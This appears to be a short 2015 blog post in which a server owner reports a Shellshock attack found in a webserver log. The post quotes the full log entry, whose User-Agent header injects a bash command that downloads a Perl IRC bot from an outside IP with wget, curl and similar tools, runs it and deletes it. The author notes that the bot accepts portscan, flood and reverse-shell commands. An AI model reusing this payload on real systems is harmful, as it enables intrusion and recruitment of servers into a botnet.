recently in the webserver log ..

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

This entry was posted on Monday, August 17th, 2015 at 17:46 and is filed under Bots, exploits. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

You must be logged in to post a comment.

spamversand

recently in the webserver log ..

Leave a Reply